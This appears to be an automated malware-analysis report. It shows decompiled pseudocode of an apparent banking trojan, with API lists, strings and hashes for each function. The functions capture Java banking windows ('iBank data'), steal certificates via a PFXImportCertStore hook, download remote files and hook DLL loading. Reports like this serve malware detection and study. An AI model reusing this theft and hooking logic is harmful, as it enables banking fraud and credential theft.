        																	 *_a4 =  *_a4 & 0x00000000;
        																	L7:
        																	return 0;
        																}
        																 *_a4 =  *_a4 & 0x00000000;
        																_t16 =  *0x414ad4; // 0x241f5a8
        																_t17 = GetProcAddress( *0x414d18,  *(_t16 + 0x68));
        																if(_t17 != 0) {
        																	 *_t17(0x8007);
        																}
        																 *((intOrPtr*)(0)) = 0;
        																_t19 = 0;
        																L38:
        																 *_t19 = 0;
        																_t19 = _t19 + 1;
        																goto L38;
        															}
        															_push( *0x4147d0);
        															L33:
        															E00406C75(_t43, _a4);
        															goto L7;
        														}
        														_push( *0x4147cc);
        														goto L33;
        													}
        													_push(0x4147e0);
        													goto L33;
        												}
        												 *_a4 =  *_a4 & 0x00000000;
        												_t23 =  *0x4147dc; // 0x6e61526c
        												if(_t23 != 0) {
        													CloseHandle(_t23);
        													 *0x4147dc =  *0x4147dc & 0x00000000;
        												}
        												goto L7;
        											}
        											_push(0x4147e0);
        											_t45 = 0x4147dc;
        											L23:
        											 *_a4 =  *_a4 & 0x00000000;
        											E00406C2F(_t41, _t45);
        											goto L7;
        										}
        										 *_a4 =  *_a4 & 0x00000000;
        										_t28 =  *0x4149e8; // 0x616c4374
        										if(_t28 != 0) {
        											CloseHandle(_t28);
        											 *0x4149e8 =  *0x4149e8 & 0x00000000;
        										}
        										goto L7;
        									}
        									_push( *0x4147d0);
        									_t45 = 0x4149e8;
        									goto L23;
        								}
        								 *_a4 =  *_a4 & 0x00000000;
        								_t31 =  *0x4147d8; // 0x6c6f7263
        								if(_t31 != 0) {
        									CloseHandle(_t31);
        									 *0x4147d8 =  *0x4147d8 & 0x00000000;
        								}
        								goto L7;
        							}
        							_push( *0x4147cc);
        							_t45 = 0x4147d8;
        							goto L23;
        						}
        						 *_a4 =  *_a4 & 0x00000000;
        						_t34 =  *0x414c94; // 0x1030
        						return _t34;
        					}
        					SetEvent( *0x4147d4);
        					goto L6;
        				} else {
        					 *_a4 =  *_a4 & 0x00000000;
        					_t37 =  *0x414b7c; // 0x418000
        					_t3 = _t37 + 8; // 0x30
        					return  *_t3;
        				}
        			}
















        APIs
        • CloseHandle.KERNEL32(6C6F7263), ref: 00406D27
        • CloseHandle.KERNEL32(616C4374), ref: 00406D5D
        • CloseHandle.KERNEL32(6E61526C), ref: 00406DA7
        • GetProcAddress.KERNELBASE(?), ref: 00406E07
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseHandle$AddressProc
        • String ID: crollRange$tClassLongW
        • API String ID: 4209786425-3577453394
        • Opcode ID: 9f371b96e2cbc969cd6f6ca89997c9fb0b43aba32ca6366163ecf9da05673d6f
        • Instruction ID: 6dedc19bcb722ddf038d00846b89cc405b19e31f7610ddcbdeb035825c7cc767
        • Opcode Fuzzy Hash: 9f371b96e2cbc969cd6f6ca89997c9fb0b43aba32ca6366163ecf9da05673d6f
        • Instruction Fuzzy Hash: BF4117716182009FEB218B54E951BA637A5FF52351F128037E507AB6E0C338DCB09B9E
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 65%
        			E00406157(struct HWND__* _a4) {
        				void* _v8;
        				void* _v12;
        				short _v72;
        				short _v592;
        				void* _t43;
        				int _t45;
        
        				_t44 = GetClassNameW(_a4,  &_v72, 0x1d);
        				if(_t19 <= 0xb) {
        					L10:
        					return  *0x414ac8(_a4);
        				}
        				_push(L"SunAwtDialog");
        				_t43 = 0xc;
        				if(E0040F6F6(_t19,  &_v72, _t43) == 0) {
        					L3:
        					_t45 = GetWindowTextW(_a4,  &_v72, 0x3b);
        					if(_t45 <= 0xa) {
        						goto L10;
        					}
        					if(_t45 != 0xe) {
        						L6:
        						if(_t45 != 0x16) {
        							goto L10;
        						}
        						_t41 =  &_v72;
        						if(E0040F1DA(0x40202c,  &_v72, 0x2e) != 0) {
        							goto L10;
        						}
        						L8:
        						_push( &_v12);
        						_push( &_v8);
        						_v12 = 0;
        						_v8 = 0;
        						if(E004065FE() != 0) {
        							E004063F9();
        							_v592 = 0;
        							GetCurrentDirectoryW(0x104,  &_v592);
        							_push(PathFindFileNameW( &_v592));
        							E0041352B(_t41, _t43, 0, 0xc8, 0, 0, L"iBank data\n\n%S\nDir: %s", _v8);
        							 *0x41479c = 1;
        						}
        						goto L10;
        					}
        					_t41 =  &_v72;
        					if(E0040F1DA(0x40200c,  &_v72, 0x1e) == 0) {
        						goto L8;
        					}
        					goto L6;
        				}
        				_push(L"javax.swing.JFrame");
        				_t43 = 0x12;
        				if(E0040F6F6(_t44,  &_v72, _t43) != 0) {
        					goto L10;
        				}
        				goto L3;
        			}










        APIs
        • GetClassNameW.USER32(?,?,0000001D), ref: 0040616A
        • GetWindowTextW.USER32(?,?,0000003B), ref: 004061B2
        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,0000002E), ref: 00406226
        • PathFindFileNameW.SHLWAPI(?), ref: 00406233
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Name$ClassCurrentDirectoryFileFindPathTextWindow
        • String ID: SunAwtDialog$iBank data%SDir: %s$javax.swing.JFrame
        • API String ID: 898933475-3318189751
        • Opcode ID: 90cdceff1649920835eff07b8bd6c180e534640d36e19a541435160d49f8a250
        • Instruction ID: b4c5599ea9592e94c7957354aa2bda35cd547b8e2b770a2c72b359a2dbc5f4e0
        • Opcode Fuzzy Hash: 90cdceff1649920835eff07b8bd6c180e534640d36e19a541435160d49f8a250
        • Instruction Fuzzy Hash: 7E21E131940228AADF20FBA5CD0AADE7B68EF54340F11417BF906F61D1D7B88E55CB88
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 70%
        			E0040741B(void* _a4, long* _a8) {
        				char _v5;
        				signed int _v12;
        				char _v16;
        				char* _v20;
        				char _v24;
        				char* _v28;
        				char _v48;
        				char _v1564;
        				char _v1568;
        				void* __ebx;
        				void* __esi;
        				signed int _t56;
        				intOrPtr _t63;
        				int _t65;
        				intOrPtr _t66;
        				char* _t69;
        				long _t70;
        				intOrPtr _t71;
        				signed int _t79;
        				long* _t81;
        				signed int _t82;
        				char* _t89;
        				void* _t91;
        				signed int _t92;
        				signed int _t93;
        				void* _t95;
        
        				_t79 = 0;
        				_t91 =  *0x414cc4(2, 2, 0);
        				if(_t91 != 0xffffffff) {
        					_v12 = 0;
        					 *0x414cf4(_t91, 0x4004747f, 0, 0,  &_v1568, 0x5f0,  &_v12, 0, 0);
        					 *0x414cb0(_t91);
        					_t82 = 0x4c;
        					_t56 = _v12 / _t82;
        					_t92 = 0;
        					_v5 = 1;
        					_v16 = 0;
        					_v20 = 0;
        					_v12 = _t56;
        					if(_t56 <= 0) {
        						L23:
        						return _t56 & 0xffffff00 | _v12 != _t79;
        					}
        					_t89 =  &_v1564;
        					do {
        						if(( *(_t89 - 4) & 0x00000001) == 0) {
        							goto L17;
        						}
        						_t56 = E004070F0(_t89);
        						if(_t56 != 0) {
        							goto L17;
        						}
        						if(_v5 != _t79) {
        							_t66 =  *0x414b7c; // 0x418000
        							_t18 = _t66 + 0x24; // 0x1a001e
        							_t84 =  *_t18 & 0x000000ff;
        							_t19 = _t66 + 0x26; // 0x200001a
        							_t21 = _t66 + 0x12c; // 0x1a014a
        							_t56 = E0040ABE5( &_v24,  *_t19 & 0x000000ff, _t92, ( *_t18 & 0x000000ff) + _t21);
        							_t92 = _t56;
        							if(_t92 != 0) {
        								_t69 = E0040F346(_t56, _v24);
        								_t92 = 0;
        								_v28 = _t69;
        								if(_t69 != 0) {
        									_t70 = GetTickCount();
        									_t81 = _a8;
        									 *_t81 = _t70;
        									_t71 =  *0x414b7c; // 0x418000
        									_t26 = _t71 + 0x28; // 0xe36d0200
        									_t93 =  *_t26 & 0x0000ffff;
        									if(InternetOpenUrlA(_a4, _v28, 0, 0, 0x84043300, 0) != 0) {
        										_t92 = E004070A8(_t84,  &_v16, _t93, _t73);
        									} else {
        										_t92 = 0;
        									}
        									 *_t81 = GetTickCount() -  *_t81;
        									E0040F15E(_v28);
        								}
        								_t56 = E0040F15E(_v24);
        							}
        							_v5 = 0;
        							_t79 = 0;
        						}
        						if(_t92 == _t79) {
        							L22:
        							goto L23;
        						} else {
        							_t63 =  *0x414ad4; // 0x241f5a8
        							_t65 = wnsprintfA( &_v48, 0x14,  *(_t63 + 0x6c),  *(_t89 + 4) & 0x000000ff,  *(_t89 + 5) & 0x000000ff,  *(_t89 + 6) & 0x000000ff,  *(_t89 + 7) & 0x000000ff);
        							_t95 = _t95 + 0x1c;
        							_t56 = E0040A3D4( &_v48, _t65, _v16, _t92, _t79, _t79, _t79);
        							if(_t56 != 0) {
        								_v12 = _t79;
        								L20:
        								if(_t92 != _t79) {
        									_t56 = E0040F15E(_v16);
        								}
        								goto L22;
        							}
        						}
        						L17:
        						_v20 =  &(_v20[1]);
        						_t56 = _v20;
        						_t89 = _t89 + 0x4c;
        					} while (_t56 < _v12);
        					goto L20;
        				}
        				return 0;
        			}






























        APIs
        • socket.WS2_32(00000002,00000002,00000000), ref: 0040742D
        • WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,?,00000000,00000000), ref: 0040745E
        • closesocket.WS2_32(00000000), ref: 00407465
        • GetTickCount.KERNEL32 ref: 004074E9
        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84043300,00000000), ref: 0040750D
        • GetTickCount.KERNEL32 ref: 00407527
        • wnsprintfA.SHLWAPI ref: 0040756D
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CountTick$InternetIoctlOpenclosesocketsocketwnsprintf
        • String ID:
        • API String ID: 1843894412-0
        • Opcode ID: 29079f2a94d991d832ef221f1bead2f3b38d6d1301c4b7bcf7facfe83ee15b0c
        • Instruction ID: b96203d3dbb770c7021f66e01e26e60930ede7da8ff16ff3c81a6b75085f5ef0
        • Opcode Fuzzy Hash: 29079f2a94d991d832ef221f1bead2f3b38d6d1301c4b7bcf7facfe83ee15b0c
        • Instruction Fuzzy Hash: E851B3B1C04119BFDB119FA4CC85AFEBBB8AF48304F058176F910B7291D638AE518BA5
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 94%
        			E0040CD37(signed int __eax, void* __ebx, void* __edi) {
        				void* __esi;
        				signed char _t40;
        				signed int _t41;
        				void* _t45;
        				void* _t62;
        				void* _t63;
        				signed int _t65;
        				void* _t69;
        				void* _t70;
        				signed char* _t74;
        
        				_t69 = __edi;
        				_t62 = __ebx;
        				_t74 = __eax * 0x30 +  *0x414f5c;
        				if(( *_t74 & 0x00000001) != 0) {
        					WaitForSingleObject(_t74[0x14], 0xffffffff);
        					CloseHandle(_t74[0x14]);
        				}
        				_push(_t62);
        				_t63 = 0;
        				if(_t74[0x28] > 0) {
        					_push(_t69);
        					_t70 = 0;
        					do {
        						E0040F15E( *((intOrPtr*)(_t74[0x24] + _t70 + 4)));
        						E0040F15E( *((intOrPtr*)(_t74[0x24] + _t70 + 0xc)));
        						E0040F15E( *((intOrPtr*)(_t74[0x24] + _t70 + 0x10)));
        						E0040F15E( *((intOrPtr*)(_t74[0x24] + _t70 + 0x14)));
        						_t63 = _t63 + 1;
        						_t70 = _t70 + 0x18;
        					} while (_t63 < _t74[0x28]);
        				}
        				E0040F15E(_t74[0x18]);
        				E0040F15E(_t74[0x24]);
        				if(( *_t74 & 0x00000002) != 0) {
        					InternetCloseHandle(_t74[0x10]);
        					InternetCloseHandle(_t74[0xc]);
        					InternetCloseHandle(_t74[8]);
        				}
        				_t40 =  *_t74;
        				if((_t40 & 0x0000000c) != 0) {
        					if((_t40 & 0x00000008) != 0) {
        						_t47 = _t74[0x2c];
        						if(_t74[0x2c] != 0) {
        							E0040F15E( *((intOrPtr*)(_t47 + 0x14)));
        						}
        					}
        					E0040F15E(_t74[0x2c]);
        				}
        				_t41 =  *0x414f58; // 0x417365
        				_t74[4] = _t74[4] & 0x00000000;
        				if(_t41 <= 0) {
        					L18:
        					return _t41;
        				} else {
        					_t65 =  *0x414f5c; // 0x72430077
        					_t36 = _t65 - 0x30; // 0x8c388038
        					if(_t74 != _t41 * 0x30 + _t36) {
        						goto L18;
        					} else {
        						if(_t41 != 1) {
        							_t42 = _t41 - 1;
        							 *0x414f58 = _t41 - 1;
        							return E0040F0F6(_t42 * 0x30, 0x414f5c);
        						}
        						_t45 = E0040F15E(_t65);
        						 *0x414f5c =  *0x414f5c & 0x00000000;
        						 *0x414f58 =  *0x414f58 & 0x00000000;
        						return _t45;
        					}
        				}
        			}














        APIs
        • WaitForSingleObject.KERNEL32(?,000000FF,?,0040E692), ref: 0040CD4D
        • CloseHandle.KERNEL32(?), ref: 0040CD56
        • InternetCloseHandle.WININET(?), ref: 0040CDBA
        • InternetCloseHandle.WININET(?), ref: 0040CDC3
        • InternetCloseHandle.WININET(?), ref: 0040CDCC
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseHandle$Internet$ObjectSingleWait
        • String ID: esA
        • API String ID: 2916869018-3029634026
        • Opcode ID: c4e11cc86cedcfdc221d876800aee5aad95e585736b9c8960f7070537dbd1c77
        • Instruction ID: 081e6302a4846881dbbaeb91573ff91519478b9ba6c7a32e075ab9846c7002c1
        • Opcode Fuzzy Hash: c4e11cc86cedcfdc221d876800aee5aad95e585736b9c8960f7070537dbd1c77
        • Instruction Fuzzy Hash: 21317E32500600DFCB316F25ED85A86BBE6AF48714B11863EE466AAAB1C735EC45CB4C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040FC6A(void* __edi, void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
        				char _v5;
        				long _v12;
        				struct _OVERLAPPED* _v16;
        				long _v20;
        				long _t32;
        				void* _t37;
        				void* _t39;
        
        				_v5 = 0;
        				_t39 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
        				if(_t39 == 0xffffffff) {
        					L15:
        					return _v5;
        				}
        				_t37 = RtlAllocateHeap( *0x415fa8, 8, 0x1004);
        				if(_t37 == 0) {
        					L13:
        					CloseHandle(_t39);
        					if(_v5 == 0) {
        						E00410093(_a8);
        					}
        					goto L15;
        				}
        				_v16 = 0;
        				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
        					if(InternetReadFile(_a4, _t37, 0x1000,  &_v12) == 0) {
        						break;
        					}
        					if(_v12 == 0) {
        						FlushFileBuffers(_t39);
        						_v5 = 1;
        						break;
        					}
        					if(WriteFile(_t39, _t37, _v12,  &_v20, 0) == 0) {
        						break;
        					}
        					_t32 = _v12;
        					if(_t32 != _v20) {
        						break;
        					}
        					_v16 = _v16 + _t32;
        					if(_v16 <= _a12) {
        						continue;
        					}
        					break;
        				}
        				E0040F15E(_t37);
        				goto L13;
        			}











        APIs
        • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040FC8A
        • RtlAllocateHeap.NTDLL(00000008,00001004,?), ref: 0040FCA9
        • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040FCC1
        • InternetReadFile.WININET(?,00000000,00001000,?), ref: 0040FCDB
        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040FCF4
        • FlushFileBuffers.KERNEL32(00000000), ref: 0040FD14
        • CloseHandle.KERNEL32(00000000), ref: 0040FD25
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$AllocateBuffersCloseCreateFlushHandleHeapInternetObjectReadSingleWaitWrite
        • String ID:
        • API String ID: 4284787851-0
        • Opcode ID: debfd7d940a02b89b86b1e4fac9470ed56e219114ba077c5aba2bbaa2e25e5ff
        • Instruction ID: d4c67cc0f7f5969401ba13ab9157cb9938766dbaa36007d5ba6a7a17ffcc68bb
        • Opcode Fuzzy Hash: debfd7d940a02b89b86b1e4fac9470ed56e219114ba077c5aba2bbaa2e25e5ff
        • Instruction Fuzzy Hash: D4218135900248BBDB219FA0EC85FEE7B79BF85310F108076F952B25D0C7795D498B69
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 77%
        			E00407889(void* __eax, void* __edi, intOrPtr _a4) {
        				int _t10;
        				void* _t11;
        				intOrPtr _t12;
        				intOrPtr* _t23;
        				int _t24;
        				void* _t26;
        				void* _t28;
        				void* _t29;
        				void* _t30;
        				void _t31;
        
        				_t28 = __edi;
        				_t29 = __eax;
        				if(__eax != 0) {
        					L8:
        					_t26 = 0;
        					if(IsBadHugeReadPtr(_t29, 0x14) != 0) {
        						L16:
        						_t10 = IsBadHugeReadPtr(_t29, 0x14);
        						if(_t10 != 0 ||  *((intOrPtr*)(_t29 + 0xc)) == _t10) {
        							L19:
        							_t11 = 0;
        							goto L20;
        						} else {
        							_t11 = _t29;
        							L20:
        							return _t11;
        						}
        					} else {
        						goto L9;
        					}
        					while(1) {
        						L9:
        						_t12 =  *((intOrPtr*)(_t29 + 0xc));
        						if(_t12 == 0) {
        							break;
        						}
        						if(IsBadHugeReadPtr(_t12 + _t28, 2) == 0) {
        							_push(_a4);
        							_push( *((intOrPtr*)(_t29 + 0xc)) + _t28);
        							_t26 = 0;
        							if( *0x414dc8() == 0) {
        								goto L16;
        							}
        							L14:
        							_t29 = _t29 + 0x14;
        							if(IsBadHugeReadPtr(_t29, 0x14) == 0) {
        								continue;
        							}
        							break;
        						}
        						_t26 = 1;
        						goto L14;
        					}
        					if(_t26 != 0) {
        						goto L19;
        					}
        					goto L16;
        				}
        				if(IsBadHugeReadPtr(__edi, 4) != 0 ||  *__edi != 0x5a4d) {
        					L12:
        					return 0;
        				} else {
        					_t23 =  *((intOrPtr*)(__edi + 0x3c)) + __edi;
        					if( *_t23 != 0x4550) {
        						goto L12;
        					}
        					_t30 = _t23 + 0x80;
        					_t24 = IsBadHugeReadPtr(_t30, 8);
        					if(_t24 != 0 ||  *((intOrPtr*)(_t30 + 4)) == _t24) {
        						goto L12;
        					} else {
        						_t31 =  *_t30;
        						if(_t31 == 0) {
        							goto L12;
        						}
        						_t29 = __edi + _t31;
        						goto L8;
        					}
        				}
        			}














        APIs
        • IsBadHugeReadPtr.KERNEL32(?,00000004), ref: 00407893
        • IsBadHugeReadPtr.KERNEL32(?,00000008), ref: 004078BD
        • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 004078DA
        • IsBadHugeReadPtr.KERNEL32(?,00000002), ref: 004078F0
        • lstrcmpi.KERNEL32(?,?), ref: 0040790E
        • IsBadHugeReadPtr.KERNEL32(-00000014,00000014), ref: 0040791E
        • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 0040792F
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: HugeRead$lstrcmpi
        • String ID:
        • API String ID: 1912838836-0
        • Opcode ID: 9b24cd91fb82fb289a08ee6086995cb4097767caec4c0e0ffd22698606fe794d
        • Instruction ID: b87a17693d0ea2a1d5d9293cbabd089311c6cea6ae44029d70b1616ca69a569d
        • Opcode Fuzzy Hash: 9b24cd91fb82fb289a08ee6086995cb4097767caec4c0e0ffd22698606fe794d
        • Instruction Fuzzy Hash: 17216F72F497119BEB305B248C08BA73398BF51751B098076E945E62E0E778EC01D7AA
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 82%
        			E00404729(void* __ecx, void* __edx) {
        				intOrPtr _t19;
        				intOrPtr _t25;
        				void* _t36;
        				intOrPtr _t37;
        				void* _t39;
        				void* _t41;
        				void* _t42;
        				void* _t45;
        				intOrPtr* _t46;
        				void* _t48;
        				void* _t50;
        
        				_t41 = __edx;
        				_t39 = __ecx;
        				_t48 = _t50 - 0x6c;
        				_t37 =  *((intOrPtr*)(_t48 + 0x78));
        				_t46 =  *((intOrPtr*)(_t48 + 0x74));
        				_t19 =  *0x414c34(_t46, _t37,  *((intOrPtr*)(_t48 + 0x7c)), _t42, _t45, _t36);
        				 *((intOrPtr*)(_t48 + 0x7c)) = _t19;
        				if(_t19 != 0 && _t46 != 0 &&  *_t46 != 0 &&  *((intOrPtr*)(_t46 + 4)) != 0) {
        					GetSystemTime(_t48 + 0x5c);
        					_t25 =  *0x414ad4; // 0x241f5a8
        					wnsprintfW(_t48 - 0x6c, 0x63,  *(_t25 + 0x180), L"grb",  *(_t48 + 0x62) & 0x0000ffff,  *(_t48 + 0x5e) & 0x0000ffff,  *(_t48 + 0x5c) & 0x0000ffff);
        					if(E0041341D(_t39, _t41, 3, 0, _t48 - 0x6c,  *((intOrPtr*)(_t46 + 4)),  *_t46) == 0) {
        						L7:
        						 *((intOrPtr*)(_t48 + 0x7c)) = 0;
        					} else {
        						if(_t37 != 0) {
        							lstrcatW(_t48 - 0x6c, L".txt");
        							if(E0041341D(_t37, _t41, 3, 0, _t48 - 0x6c, _t37, E0040F649(_t37) + _t32) == 0) {
        								goto L7;
        							}
        						}
        					}
        				}
        				return  *((intOrPtr*)(_t48 + 0x7c));
        			}















        APIs
        • PFXImportCertStore.CRYPT32(?,?,?), ref: 00404742
        • GetSystemTime.KERNEL32(?), ref: 0040476E
        • wnsprintfW.SHLWAPI ref: 00404799
        • lstrcatW.KERNEL32(?,.txt), ref: 004047C4
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CertImportStoreSystemTimelstrcatwnsprintf
        • String ID: .txt$grb
        • API String ID: 1380901484-2795990106
        • Opcode ID: c61322fbf3309272e70b01194ada5128c4cbad75fe4855e665480c5f55a78705
        • Instruction ID: 3be26e79084ef858318da3bc01e19091e52679322a649ec0e745cfee319fbd73
        • Opcode Fuzzy Hash: c61322fbf3309272e70b01194ada5128c4cbad75fe4855e665480c5f55a78705
        • Instruction Fuzzy Hash: E72183B1500608AADB31AFA5DC44DEAB7ECEB8D705F114537FA64E3191D3399A04CB25
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 46%
        			E00405C84(WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
        				short _v524;
        				void* __esi;
        				long _t15;
        				WCHAR* _t25;
        				void* _t28;
        				void* _t29;
        				void* _t36;
        				HMODULE* _t37;
        				UNICODE_STRING* _t38;
        				intOrPtr _t47;
        
        				_t38 = _a12;
        				if( *0x414d14 == 0 && _t38 != 0) {
        					_t25 =  *(_t38 + 4);
        					if(_t25 != 0) {
        						lstrcpynW( &_v524, _t25, (( *_t38 & 0x0000ffff) >> 1) + 1);
        					}
        				}
        				_t37 = _a16;
        				_t29 =  *0x414c08(_a4, _a8, _t38, _t37, _t28);
        				_t15 = LdrLoadDll(_a4, _a8, _t38, _t37);
        				_a8 = _t15;
        				if(_t15 == 0 && _t29 != 0 &&  *( *_t37) == 0x5a4d) {
        					 *0x414ed8(0x414784);
        					E00407A50(0x4144e0, 0x5a4d, _t36,  *_t37);
        					 *0x414edc(0x414784);
        				}
        				_t47 =  *0x414d14; // 0x1d50065
        				if(_t47 == 0 && _a8 == 0 && _t38 != 0 && _t37 != 0 &&  *(_t38 + 4) != 0) {
        					E0040BEAD( *_t37,  &_v524);
        				}
        				return _a8;
        			}














        APIs
        • lstrcpynW.KERNEL32(?,?), ref: 00405CB5
        • LdrGetDllHandle.NTDLL(?,?,?,?), ref: 00405CC7
        • LdrLoadDll.NTDLL(?,?,?,?), ref: 00405CD7
        • RtlEnterCriticalSection.NTDLL(FrameRect), ref: 00405CFA
        • RtlLeaveCriticalSection.NTDLL(FrameRect), ref: 00405D0D
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterHandleLeaveLoadlstrcpyn
        • String ID: FrameRect
        • API String ID: 2966231580-1529682053
        • Opcode ID: 2305a90f837fce8756c83d8e436a2c5f9c8b2ea83bc4c7f88c3a63c7484ec3f3
        • Instruction ID: 4d8fdf2636f4e89a694751e06147236880839881aab1442c9ed42e6236f561cf
        • Opcode Fuzzy Hash: 2305a90f837fce8756c83d8e436a2c5f9c8b2ea83bc4c7f88c3a63c7484ec3f3
        • Instruction Fuzzy Hash: 22218876501615ABDF209F60DC489AB77A8EF84344B00C43BF952A72A0EB78DD50CFA8
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00405456(intOrPtr _a4, intOrPtr _a8) {
        				signed int _v5;
        				char _v6;
        				char _v12;
        				char _v16;
        				char _v20;
        				intOrPtr _t52;
        				intOrPtr _t57;
        				signed int _t58;
        				void* _t61;
        				void* _t66;
        				void* _t69;
        				char _t71;
        				int _t72;
        				void* _t76;
        				void* _t77;
        				intOrPtr _t80;
        				char* _t82;
        				intOrPtr _t84;
        				void* _t86;
        
        				_t71 = 0;
        				_t84 = _a8;
        				_v16 = 0;
        				_v6 = 0;
        				_v20 = 0;
        				_v12 = 0;
        				if(_t84 <= 0) {
        					L43:
        					return _v12 - _t71 + _t84;
        				} else {
        					do {
        						_t80 = _a4;
        						if(_v16 == 0 ||  *((char*)(_t71 + _t80)) != 0x3e) {
        							_t52 =  *((intOrPtr*)(_t71 + _t80));
        							if(_t52 != 0x3c) {
        								if(_v16 != 0 || _v6 != 0 || _t52 == 0xd || _t52 == 0xa || _t52 == 9) {
        									goto L41;
        								} else {
        									if(_t52 != 0x26 || _t84 - _t71 <= 5) {
        										L39:
        										 *((char*)(_v12 + _t80)) =  *((intOrPtr*)(_t71 + _t80));
        										goto L40;
        									} else {
        										_t38 = _t80 + 1; // 0x1
        										if(StrCmpNIA(_t71 + _t38, "nbsp;", 5) != 0) {
        											goto L39;
        										}
        										 *((char*)(_v12 + _t80)) = 0x20;
        										_t71 = _t71 + 5;
        										L40:
        										_v12 = _v12 + 1;
        										goto L41;
        									}
        								}
        							}
        							_t57 = _v16;
        							_v16 = _v16 + 1;
        							if(_t57 != 0) {
        								goto L41;
        							}
        							_t86 = _t84 - _t71;
        							_t16 = _t80 + 1; // 0x1
        							_t82 = _t71 + _t16;
        							if(_v6 == _t57) {
        								if(_t86 <= 6) {
        									L21:
        									_v5 = 0;
        									do {
        										_t58 = _v5 & 0x000000ff;
        										_t22 = _t58 + 0x401b04; // 0x2020202
        										_t72 =  *_t22 & 0x000000ff;
        										if(_t86 <= _t72) {
        											goto L27;
        										}
        										if(StrCmpNIA(_t82,  *(0x401af4 + _t58 * 4), _t72) != 0) {
        											_t61 = 0;
        										} else {
        											_t61 = E00405435(_t82, _t72);
        										}
        										if(_t61 != 0) {
        											_t30 =  &(("\n\n\n script")[_v5 & 0x000000ff]); // 0x200a0a0a
        											_t71 = _v20;
        											 *((char*)(_v12 + _a4)) =  *_t30;
        											goto L40;
        										}
        										L27:
        										_v5 = _v5 + 1;
        									} while (_v5 < 4);
        									_t71 = _v20;
        									goto L41;
        								}
        								if(StrCmpNIA(_t82, "script", 6) != 0) {
        									_t66 = 0;
        								} else {
        									_t76 = 6;
        									_t66 = E00405435(_t82, _t76);
        								}
        								if(_t66 == 0) {
        									goto L21;
        								} else {
        									_v6 = 1;
        									goto L41;
        								}
        							}
        							if(_t86 > 7 &&  *_t82 == 0x2f) {
        								_t83 =  &(_t82[1]);
        								if(StrCmpNIA( &(_t82[1]), "script", 6) != 0) {
        									_t69 = 0;
        								} else {
        									_t77 = 6;
        									_t69 = E00405435(_t83, _t77);
        								}
        								if(_t69 != 0) {
        									_v6 = 0;
        								}
        							}
        						} else {
        							_v16 = _v16 - 1;
        						}
        						L41:
        						_t84 = _a8;
        						_t71 = _t71 + 1;
        						_v20 = _t71;
        					} while (_t71 < _t84);
        					goto L43;
        				}
        			}























        APIs
        • StrCmpNIA.SHLWAPI(00000002,script,00000006), ref: 004054CE
        • StrCmpNIA.SHLWAPI(00000001,script,00000006), ref: 00405504
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID:
        • String ID: nbsp;$script
        • API String ID: 0-298180595
        • Opcode ID: dc6878109b0c659419326159b9f265711e2c7b00f93621642e501e224fbf65ee
        • Instruction ID: d7747634e3afbc1a5463df14372a343ee96f08d2062dcb6b4a4deb43454e8e66
        • Opcode Fuzzy Hash: dc6878109b0c659419326159b9f265711e2c7b00f93621642e501e224fbf65ee
        • Instruction Fuzzy Hash: 9251C171A046497ACF319BA48C807FFBB72DB02304F5440BBD891772C6D63D99868F69
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 78%
        			E004127C5(void** __esi, WCHAR* _a4) {
        				char _v12;
        				signed int _v16;
        				signed int _v20;
        				signed int _v24;
        				signed int _v28;
        				char _v33;
        				void _v36;
        				long _v40;
        				char _v41;
        				void* _t38;
        				int _t50;
        				int _t51;
        				signed int _t53;
        				int _t54;
        				int _t57;
        				signed int _t60;
        				signed int _t61;
        				struct _OVERLAPPED* _t65;
        				struct _OVERLAPPED* _t69;
        				void** _t72;
        
        				_t72 = __esi;
        				_push(_t60);
        				_t69 = 0;
        				_v33 = 0;
        				_t38 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 2, 0);
        				_t61 = _t60 | 0xffffffff;
        				 *__esi = _t38;
        				if(_t38 != _t61) {
